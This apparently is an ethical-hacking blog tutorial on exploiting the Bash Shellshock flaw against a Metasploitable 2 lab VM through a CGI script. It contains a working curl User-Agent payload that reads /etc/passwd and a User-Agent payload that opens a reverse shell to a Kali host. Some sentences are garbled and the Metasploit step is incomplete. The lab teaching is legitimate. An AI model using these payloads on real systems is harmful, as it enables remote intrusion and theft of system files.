Metasploitable 2 doesn’t come with the shellshock vulnerabillity. But that doesn’t mean we can’t put one there. This tutorial will show you how to exploit shellshock on Metasploitable 2 by Rapid7.
Table of Contents
What Is The Shellshock Vulnerability?
Vulnerable versions of the bash program allowed for arbitrary code execution, because of this vulnerability. The vulnerability lies in the way the user can create environment variables in bash containing a function definition. Trailing commands after the function definition are erroneously executed resulting in code execution. The vulnerability exists in all bash versions up to version 4.3.
Apache webservers use the Common Gateway Interface to handle web requests Bash receives the environment variables from the server and process them. A maliciously crafted server request can be used to exploit this flaw in the vulnerable version of bash.
is running the shellshock vulnerability is attacked through the context of a web application. Apache CGI_scripts which don’t require authentication.
By targeting these scripts and defining a malicious function definition in the HTTP_User_Agent header, we can exploit the vulnerability to get a reverse shell back to the Kali box.
Setting Up Metasploitable 2 Shellshock Vulnerability
While Metasploitable 2 does not come with the shellshock vulnerability, this is confirmed by a nikto scan, we can create one. This is made possible by creating a simple CGI bash script to display a message in html on the VM. Login to the target and run the following commands:
- Sudo su ( enter msfadmin )
- Cd /usr/lib/cgi-bin
- Write the following:
#! /bin/bash
echo “Content-type: text/html”
echo ‘’
echo ‘Exploit Me!’
- Chmod 755 shellshock.sh
Apache needs a content type and a space in order to render the script.
Now open the Kali Linux VM and view the web page by going to <m2ip/cgi-bin/shellshock.sh>
Exploit Shellshock Using Curl
Use the following command to execute the “cat /etc/passwd” command on the Metasploitable 2 machine remotely from Kali Linux:
[root@kali] $ curl -H “user-agent: () { :; }; echo; echo; /bin/bash -c ‘cat /etc/passwd'” \http://m2ip/cgi-bin/shellshock.sh
Exploit Shellshock Using Burp Suite
After the User-Agent field I have put in the bash one-liner reverse shell to be executed on the target.
User-Agent: () { :; };/bin/bash -i >& /dev/tcp/10.0.0.2/1234 0>&1
How To Exploit Shellshock With Metasploit
You can exploit Shellshock vulnerability with Metasploit by using a module,
And run the exploit module.
Recommended Reading
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.